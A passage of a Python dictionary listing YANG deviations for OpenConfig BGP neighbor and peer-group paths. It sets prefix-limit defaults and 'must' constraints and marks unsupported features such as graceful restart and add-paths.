('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.State.Prefixes.installed' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.Config.allow_own_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.Config.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.State.allow_own_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.State.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Config.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Config.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.ErrorHandling' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.Config.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.local_restarting' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.mode' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.peer_restarting' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.LoggingOptions' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.State.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.State.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Timers.Config.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Timers.State.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Timers.State.uptime' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Transport.Config.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Transport.State.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.UseMultiplePaths' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.Config.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.Config.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.State.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.State.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.Config.default_export_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.Config.default_import_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.State.default_export_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.State.default_import_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.GracefulRestart.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.GracefulRestart.State.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.max_prefixes' : {
